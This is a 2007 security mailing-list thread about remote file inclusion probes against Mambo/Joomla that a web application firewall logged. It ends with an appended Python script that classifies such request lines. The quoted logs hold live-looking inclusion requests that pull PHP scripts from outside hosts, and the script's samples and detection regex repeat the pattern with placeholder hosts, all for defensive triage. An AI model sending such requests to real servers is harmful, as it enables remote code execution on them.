Security Basics mailing list archives
Re: PHP web exploit/vulnerability
From: Danux <danuxx () gmail com>
Date: Tue, 23 Oct 2007 12:31:07 -0500
First of all, those kinds of attacks are trying to exploit a Content Management Software called "Mambo" or maybe Joomla (Next Generation), so if you have this sw installed on your server you should check if you have the required patches!! If you don't have this sw... then they are all false positives.

But you should also check if your PHP apps are not vulnerable to this kind of attack: I mean... Remote File Inclusion, and so on.

Cheers!!!!

On 10/23/07, Camilo Olea <colea () sunset com mx> wrote:
> Hello everyone,
>
> I'm sorry if this is a stupid question, but I just wanted your input, maybe direct me to some links, another mail list, or whatever you might add would be highly appreciated; we have modsecurity installed on our server, and it has been logging many attacks like the following:
>
> GET /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti \
> ngen.de/admin/ec.txt? HTTP/1.1
>
> GET /index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)% \
> 20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1
>
> GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1
>
> I managed to get a copy of the php script which these attacks try to force the server to execute, I could post it here if that is correct and anybody could take a look at it and help me out a little to understand what it's trying to do.
>
> Any help is appreciated, thanks in advance.
>
> Camilo Olea
--
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com
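
The triage suggested in the reply above, as an added example that is not part of either poster's message: it sorts logged request lines into CMS-specific inclusion attempts (only relevant if Mambo/Joomla is installed) and generic ones (relevant to any PHP app). The sample lines are constructed with placeholder hosts, and the verdict names and the `classify`/`triage` helpers are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed request lines modelled on the ones quoted in the thread;
# the hosts are placeholders, not the hosts from the original log.
SAMPLE_REQUESTS = [
    "GET /content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://files.example.invalid/ec.txt? HTTP/1.1",
    "GET /index.php?option=http://host.example.invalid/pb.php? HTTP/1.1",
    "GET /index.php?mosConfig_absolute_path=%68ttp%3A%2F%2Ffiles.example.invalid%2Fx.txt%3F HTTP/1.1",
    "GET /index.php?option=com_x//mambots/*.php?mosConfig_absolute_path=junk%0A? HTTP/1.1",
    "GET /index.php?option=com_content&task=view&id=5 HTTP/1.1",
    "GET /go.php?next=/docs/http://readme HTTP/1.1",
]

CMS_PARAM = "mosConfig_absolute_path"  # parameter named in the logged requests
REMOTE_URL = re.compile(r"\s*(?:https?|ftps?)://", re.IGNORECASE)


def classify(request_line):
    """Return (verdict, parameter) for one 'METHOD target PROTOCOL' line."""
    parts = request_line.strip().split(" ")
    if len(parts) < 3:
        return ("unparsed", None)
    target = " ".join(parts[1:-1])          # tolerate raw spaces in the target
    query = urlsplit(target).query
    # parse_qsl percent-decodes once, so %68ttp%3A%2F%2F is seen as http://
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL.match(value):          # value *starts* with a remote URL
            verdict = "rfi-cms" if name == CMS_PARAM else "rfi-generic"
            return (verdict, name)
    if CMS_PARAM in unquote(query):          # name buried inside another value
        return ("cms-probe-malformed", CMS_PARAM)
    return ("clean", None)


def triage(lines):
    """Count verdicts so CMS-specific noise is separated from generic probes."""
    return Counter(classify(line)[0] for line in lines)


if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(classify(line), line[:70])
    print(dict(triage(SAMPLE_REQUESTS)))
```

The last sample line stays "clean" because the match is anchored to the start of the decoded value, so a URL-like string in the middle of a local path is not flagged.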